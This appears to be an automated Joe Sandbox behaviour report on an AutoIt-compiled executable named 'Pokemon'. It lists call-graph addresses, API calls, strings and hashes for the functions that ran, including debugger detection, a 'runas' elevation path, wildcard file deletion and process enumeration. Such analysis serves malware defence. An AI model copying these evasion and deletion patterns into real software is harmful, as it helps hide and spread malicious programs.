API calls 105954 9d66e messages 105953->105954 105956 9bed9 8 API calls 105954->105956 105959 e1f79 105954->105959 105960 e1f94 105954->105960 105962 9c3ab 8 API calls 105954->105962 105963 9d911 messages 105954->105963 105978 9b4c8 8 API calls 105954->105978 105955 9c3ab 8 API calls 105964 9d9ac messages 105955->105964 105956->105954 105979 f56ae 8 API calls messages 105959->105979 105962->105954 105963->105955 105963->105964 105965 9d9c3 105964->105965 105973 ae30a 8 API calls messages 105964->105973 105970 9c33d 105966->105970 105967 9c345 105967->105953 105968 b014b 8 API calls 105968->105970 105969 9bf73 8 API calls 105969->105970 105970->105967 105970->105968 105970->105969 105971 9bed9 8 API calls 105970->105971 105972 9c32d 8 API calls 105970->105972 105971->105970 105972->105970 105973->105964 105974->105937 105975->105931 105976->105931 105977->105931 105978->105954 105979->105960 104776 9f4dc 104779 9cab0 104776->104779 104780 9cacb 104779->104780 104781 e14be 104780->104781 104782 e150c 104780->104782 104801 9caf0 104780->104801 104785 e14c8 104781->104785 104788 e14d5 104781->104788 104781->104801 104819 1162ff 224 API calls 2 library calls 104782->104819 104817 116790 224 API calls 104785->104817 104787 abc58 8 API calls 104787->104801 104803 9cdc0 104788->104803 104818 116c2d 224 API calls 2 library calls 104788->104818 104791 e179f 104791->104791 104793 9cf80 39 API calls 104793->104801 104795 ae807 39 API calls 104795->104801 104797 9cdee 104798 e16e8 104822 116669 81 API calls 104798->104822 104801->104787 104801->104793 104801->104795 104801->104797 104801->104798 104802 9be2d 39 API calls 104801->104802 104801->104803 104807 a0340 224 API calls 104801->104807 104808 9bed9 8 API calls 104801->104808 104810 ae7c1 39 API calls 104801->104810 104811 aaa99 224 API calls 104801->104811 104812 b05b2 5 API calls __Init_thread_wait 104801->104812 104813 b0413 29 API calls __onexit 104801->104813 104814 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104801->104814 104815 af4df 81 API calls 104801->104815 104816 af346 224 API calls 104801->104816 104820 9b4c8 8 API calls 104801->104820 104821 effaf 8 API calls 104801->104821 104802->104801 104803->104797 104823 103fe1 81 API calls __wsopen_s 104803->104823 104807->104801 104808->104801 104810->104801 104811->104801 104812->104801 104813->104801 104814->104801 104815->104801 104816->104801 104817->104788 104818->104803 104819->104801 104820->104801 104821->104801 104822->104803 104823->104791 105980 a0ebf 105981 a0ed3 105980->105981 105987 a1425 105980->105987 105982 a0ee5 105981->105982 105983 b014b 8 API calls 105981->105983 105984 e562c 105982->105984 105986 a0f3e 105982->105986 106013 9b4c8 8 API calls 105982->106013 105983->105982 106014 101b14 8 API calls 105984->106014 105989 a2b20 224 API calls 105986->105989 106005 a049d messages 105986->106005 105987->105982 105990 9bed9 8 API calls 105987->105990 106011 a0376 messages 105989->106011 105990->105982 105991 e632b 106018 103fe1 81 API calls __wsopen_s 105991->106018 105992 a1e50 40 API calls 105992->106011 105993 a1695 105998 9bed9 8 API calls 105993->105998 105993->106005 105994 b014b 8 API calls 105994->106011 105996 e5cdb 106002 9bed9 8 API calls 105996->106002 105996->106005 105997 e625a 106017 103fe1 81 API calls __wsopen_s 105997->106017 105998->106005 106001 a1990 224 API calls 106001->106011 106002->106005 106003 9bed9 8 API calls 106003->106011 106004 9bf73 8 API calls 106004->106011 106006 b0413 29 API calls pre_c_initialization 106006->106011 106007 b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 106007->106011 106008 e6115 106015 103fe1 81 API calls __wsopen_s 106008->106015 106010 a0aae messages 106016 103fe1 81 API calls __wsopen_s 106010->106016 106011->105991 106011->105992 106011->105993 106011->105994 106011->105996 106011->105997 106011->106001 106011->106003 106011->106004 106011->106005 106011->106006 106011->106007 106011->106008 106011->106010 106012 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 106011->106012 106012->106011 106013->105982 106014->106005 106015->106010 106016->106005 106017->106005 106018->106005 104824 a235c 104825 a2365 __fread_nolock 104824->104825 104826 98ec0 52 API calls 104825->104826 104827 e74e3 104825->104827 104830 a23b6 104825->104830 104832 b014b 8 API calls 104825->104832 104834 a1ff7 __fread_nolock 104825->104834 104835 b017b 8 API calls 104825->104835 104826->104825 104836 f13c8 8 API calls __fread_nolock 104827->104836 104829 e74ef 104833 9bed9 8 API calls 104829->104833 104829->104834 104831 97d74 8 API calls 104830->104831 104831->104834 104832->104825 104833->104834 104835->104825 104836->104829 106019 c947a 106020 c9487 106019->106020 106024 c949f 106019->106024 106069 bf649 20 API calls __dosmaperr 106020->106069 106022 c948c 106070 c2b5c 26 API calls pre_c_initialization 106022->106070 106025 c9497 106024->106025 106026 c94fa 106024->106026 106071 d0144 21 API calls 2 library calls 106024->106071 106028 bdcc5 __fread_nolock 26 API calls 106026->106028 106029 c9512 106028->106029 106039 c8fb2 106029->106039 106031 c9519 106031->106025 106032 bdcc5 __fread_nolock 26 API calls 106031->106032 106033 c9545 106032->106033 106033->106025 106034 bdcc5 __fread_nolock 26 API calls 106033->106034 106035 c9553 106034->106035 106035->106025 106036 bdcc5 __fread_nolock 26 API calls 106035->106036 106037 c9563 106036->106037 106038 bdcc5 __fread_nolock 26 API calls 106037->106038 106038->106025 106040 c8fbe CallCatchBlock 106039->106040 106041 c8fde 106040->106041 106042 c8fc6 106040->106042 106044 c90a4 106041->106044 106049 c9017 106041->106049 106073 bf636 20 API calls __dosmaperr 106042->106073 106080 bf636 20 API calls __dosmaperr 106044->106080 106045 c8fcb 106074 bf649 20 API calls __dosmaperr 106045->106074 106047 c90a9 106081 bf649 20 API calls __dosmaperr 106047->106081 106051 c903b 106049->106051 106052 c9026 106049->106052 106072 c54ba EnterCriticalSection 106051->106072 106075 bf636 20 API calls __dosmaperr 106052->106075 106054 c9033 106082 c2b5c 26 API calls pre_c_initialization 106054->106082 106056 c9041 106058 c905d 106056->106058 106059 c9072 106056->106059 106057 c902b 106076 bf649 20 API calls __dosmaperr 106057->106076 106077 bf649 20 API calls __dosmaperr 106058->106077 106064 c90c5 __fread_nolock 38 API calls 106059->106064 106061 c8fd3 __fread_nolock 106061->106031 106066 c906d 106064->106066 106065 c9062 106078 bf636 20 API calls __dosmaperr 106065->106078 106079 c909c LeaveCriticalSection __wsopen_s 106066->106079 106069->106022 106070->106025 106071->106026 106072->106056 106073->106045 106074->106061 106075->106057 106076->106054 106077->106065 106078->106066 106079->106061 106080->106047 106081->106054 106082->106061 106083 91033 106088 968b4 106083->106088 106087 91042 106089 9bf73 8 API calls 106088->106089 106090 96922 106089->106090 106096 9589f 106090->106096 106093 969bf 106094 91038 106093->106094 106099 96b14 8 API calls __fread_nolock 106093->106099 106095 b0413 29 API calls __onexit 106094->106095 106095->106087 106100 958cb 106096->106100 106099->106093 106101 958be 106100->106101 106102 958d8 106100->106102 106101->106093 106102->106101 106103 958df RegOpenKeyExW 106102->106103 106103->106101 106104 958f9 RegQueryValueExW 106103->106104 106105 9591a 106104->106105 106106 9592f RegCloseKey 106104->106106 106105->106106 106106->106101 104837 e6555 104838 b014b 8 API calls 104837->104838 104839 e655c 104838->104839 104840 e6575 __fread_nolock 104839->104840 104842 b017b 8 API calls 104839->104842 104841 b017b 8 API calls 104840->104841 104843 e659a 104841->104843 104842->104840 106107 936f5 106110 9370f 106107->106110 106111 93726 106110->106111 106112 9372b 106111->106112 106113 9378a 106111->106113 106154 93788 106111->106154 106114 93738 106112->106114 106115 93804 PostQuitMessage 106112->106115 106117 d3df4 106113->106117 106118 93790 106113->106118 106119 93743 106114->106119 106120 d3e61 106114->106120 106122 93709 106115->106122 106116 9376f DefWindowProcW 106116->106122 106165 92f92 10 API calls 106117->106165 106123 937bc SetTimer RegisterWindowMessageW 106118->106123 106124 93797 106118->106124 106127 9374d 106119->106127 106128 9380e 106119->106128 106168 fc8f7 65 API calls ___scrt_fastfail 106120->106168 106123->106122 106129 937e5 CreatePopupMenu 106123->106129 106125 d3d95 106124->106125 106126 937a0 KillTimer 106124->106126 106138 d3d9a 106125->106138 106139 d3dd0 MoveWindow 106125->106139 106132 93907 Shell_NotifyIconW 106126->106132 106133 93758 106127->106133 106134 d3e46 106127->106134 106155 afcad 106128->106155 106129->106122 106131 d3e15 106166 af23c 40 API calls 106131->106166 106142 937b3 106132->106142 106143 93763 106133->106143 106144 937f2 106133->106144 106134->106116 106167 f1423 8 API calls 106134->106167 106135 d3e73 106135->106116 106135->106122 106140 d3dbf SetFocus 106138->106140 106141 d3da0 106138->106141 106139->106122 106140->106122 106141->106143 106145 d3da9 106141->106145 106162 959ff DeleteObject DestroyWindow 106142->106162 106143->106116 106151 93907 Shell_NotifyIconW 106143->106151 106163 9381f 75 API calls ___scrt_fastfail 106144->106163 106164 92f92 10 API calls 106145->106164 106150 93802 106150->106122 106152 d3e3a 106151->106152 106153 9396b 60 API calls 106152->106153 106153->106154 106154->106116 106156 afd4b 106155->106156 106157 afcc5 ___scrt_fastfail 106155->106157 106156->106122 106158 961a9 55 API calls 106157->106158 106160 afcec 106158->106160 106159 afd34 KillTimer SetTimer 106159->106156 106160->106159 106161 efe2b Shell_NotifyIconW 106160->106161 106161->106159 106162->106122 106163->106150 106164->106122 106165->106131 106166->106143 106167->106154 106168->106135 104844 e5650 104853 ae3d5 104844->104853 104846 e5666 104848 e56e1 104846->104848 104862 aaa65 9 API calls 104846->104862 104850 e61d7 104848->104850 104864 103fe1 81 API calls __wsopen_s 104848->104864 104851 e56c1 104851->104848 104863 10247e 8 API calls 104851->104863 104854 ae3e3 104853->104854 104855 ae3f6 104853->104855 104865 9b4c8 8 API calls 104854->104865 104856 ae3fb 104855->104856 104857 ae429 104855->104857 104859 b014b 8 API calls 104856->104859 104866 9b4c8 8 API calls 104857->104866 104861 ae3ed 104859->104861 104861->104846 104862->104851 104863->104848 104864->104850 104865->104861 104866->104861

                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                      Function 00095FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 234 95fc8-96037 call 9bf73 GetVersionExW call 98577 239 d507d-d5090 234->239 240 9603d 234->240 241 d5091-d5095 239->241 242 9603f-96041 240->242 243 d5098-d50a4 241->243 244 d5097 241->244 245 d50bc 242->245 246 96047-960a6 call 9adf4 call 955dc 242->246 243->241 247 d50a6-d50a8 243->247 244->243 250 d50c3-d50cf 245->250 259 960ac-960ae 246->259 260 d5224-d522b 246->260 247->242 249 d50ae-d50b5 247->249 249->239 252 d50b7 249->252 253 9611c-96136 GetCurrentProcess IsWow64Process 250->253 252->245 255 96138 253->255 256 96195-9619b 253->256 258 9613e-9614a 255->258 256->258 265 d5269-d526d GetSystemInfo 258->265 266 96150-9615f LoadLibraryA 258->266 261 d5125-d5138 259->261 262 960b4-960b7 259->262 263 d522d 260->263 264 d524b-d524e 260->264 268 d513a-d5143 261->268 269 d5161-d5163 261->269 262->253 270 960b9-960f5 262->270 267 d5233 263->267 271 d5239-d5241 264->271 272 d5250-d525f 264->272 273 9619d-961a7 GetSystemInfo 266->273 274 96161-9616f GetProcAddress 266->274 267->271 276 d5145-d514b 268->276 277 d5150-d515c 268->277 279 d5198-d519b 269->279 280 d5165-d517a 269->280 270->253 278 960f7-960fa 270->278 271->264 272->267 281 d5261-d5267 272->281 275 96177-96179 273->275 274->273 282 96171-96175 GetNativeSystemInfo 274->282 289 9617b-9617c FreeLibrary 275->289 290 96182-96194 275->290 276->253 277->253 283 d50d4-d50e4 278->283 284 96100-9610a 278->284 287 d519d-d51b8 279->287 288 d51d6-d51d9 279->288 285 d517c-d5182 280->285 286 d5187-d5193 280->286 281->271 282->275 294 d50f7-d5101 283->294 295 d50e6-d50f2 283->295 284->250 291 96110-96116 284->291 285->253 286->253 292 d51ba-d51c0 287->292 293 d51c5-d51d1 287->293 288->253 296 d51df-d5206 288->296 289->290 291->253 292->253 293->253 297 d5114-d5120 294->297 298 d5103-d510f 294->298 295->253 299 d5208-d520e 296->299 300 d5213-d521f 296->300 297->253 298->253 299->253 300->253
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00095FF7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,0012DC2C,00000000,?,?), ref: 00096123
                                                                                                                                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 0009612A
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00096155
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00096167
                                                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00096175
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009617C
                                                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 000961A1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                      • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                      • Opcode ID: 92b23c28940da0f56cc62a6355eff7cf553ab8c47700db5ef61d0bbcbe18ce88
                                                                                                                                                                                                                                                                                      • Instruction ID: a90c8bc66cc2d057c700ac62386f7e0862ab3021b298f46cfce0ec86669b7963
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b23c28940da0f56cc62a6355eff7cf553ab8c47700db5ef61d0bbcbe18ce88
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A1832290ABC4DFCB21CB697C815A97FA47B3F301B084899D88197B62C7BD45C8DB31
                                                                                                                                                                                                                                                                                      Function 0009338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00093368,?), ref: 000933BB
                                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00093368,?), ref: 000933CE
                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00162418,00162400,?,?,?,?,?,?,00093368,?), ref: 0009343A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00093462,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000942A0
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000934BB
                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 000D3CB0
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000D3CF1
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001531F4,00162418,?,?,?,?,?,?,?,00093368), ref: 000D3D7A
                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 000D3D81
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: GetSysColorBrush.USER32(0000000F), ref: 000934DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: LoadCursorW.USER32(00000000,00007F00), ref: 000934ED
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: LoadIconW.USER32(00000063), ref: 00093503
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: LoadIconW.USER32(000000A4), ref: 00093515
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: LoadIconW.USER32(000000A2), ref: 00093527
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0009353F
                                                                                                                                                                                                                                                                                        • Part of subcall function 000934D3: RegisterClassExW.USER32(?), ref: 00093590
                                                                                                                                                                                                                                                                                        • Part of subcall function 000935B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000935E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000935B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00093602
                                                                                                                                                                                                                                                                                        • Part of subcall function 000935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 00093616
                                                                                                                                                                                                                                                                                        • Part of subcall function 000935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 0009361F
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093A3C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 000D3CAA
                                                                                                                                                                                                                                                                                      • runas, xrefs: 000D3D75
                                                                                                                                                                                                                                                                                      • AutoIt, xrefs: 000D3CA5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                      • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                      • Opcode ID: e6389c6e2cbbbfdcce9c425286314aa2c9e976a2e5804899aa8135f8ad2e5bd0
                                                                                                                                                                                                                                                                                      • Instruction ID: ce9bb9b5ff19d840620bfa080a43ad7f930d939343e40378ebf2906bad043869
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6389c6e2cbbbfdcce9c425286314aa2c9e976a2e5804899aa8135f8ad2e5bd0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE51F870108740AECF11EF60EC15DEE7BA8AF94744F00042DF592576A3DF749A8AEB62
                                                                                                                                                                                                                                                                                      Function 000FDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1023 fdc54-fdc9b call 9bf73 * 3 call 95851 call feab0 1034 fdc9d-fdca6 call 96b7c 1023->1034 1035 fdcab-fdcdc call 9568e FindFirstFileW 1023->1035 1034->1035 1039 fdcde-fdce0 1035->1039 1040 fdd4b-fdd52 FindClose 1035->1040 1039->1040 1042 fdce2-fdce7 1039->1042 1041 fdd56-fdd78 call 9bd98 * 3 1040->1041 1044 fdce9-fdd24 call 9bed9 call 97bb5 call 96b7c DeleteFileW 1042->1044 1045 fdd26-fdd38 FindNextFileW 1042->1045 1044->1045 1058 fdd42-fdd49 FindClose 1044->1058 1045->1039 1046 fdd3a-fdd40 1045->1046 1046->1039 1058->1041
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 000FDCCB
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 000FDD1B
                                                                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000FDD2C
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDD43
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 000FDD4C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: f1b605cf0bff96227f712aed162c895b894c96701ee8d3baff676d11d30126f7
                                                                                                                                                                                                                                                                                      • Instruction ID: fc13167fa04e5261ca0d68f1cc54263ad02d64ea35ba9a4c65b94fbc84067383
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b605cf0bff96227f712aed162c895b894c96701ee8d3baff676d11d30126f7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77319E31009349AFC710EB20D9918EFB7E9BF91310F400D6EF5D582192EB21DA0AEB63
                                                                                                                                                                                                                                                                                      Function 000FDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 000FDDAC
                                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 000FDDBA
                                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 000FDDDA
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000FDE87
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d364ab24d09b3dcb66a5ede8a11ebd448d44588cfee191aa52da42011f67dee6
                                                                                                                                                                                                                                                                                      • Instruction ID: b008263ca7c180ea920672dafb2dd423fe3f9ee3e7b1b6e242d631e5d6469655
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d364ab24d09b3dcb66a5ede8a11ebd448d44588cfee191aa52da42011f67dee6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88319371008304AFD710EF50DC85AAFBBE8AF95350F14092DF585871A2EB719A49DB92
                                                                                                                                                                                                                                                                                      Function 0009EE4C Relevance: 21.6, APIs: 14, Instructions: 617windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 0009EF07
                                                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0009F107
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F228
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0009F27B
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0009F289
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F29F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009F2B1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
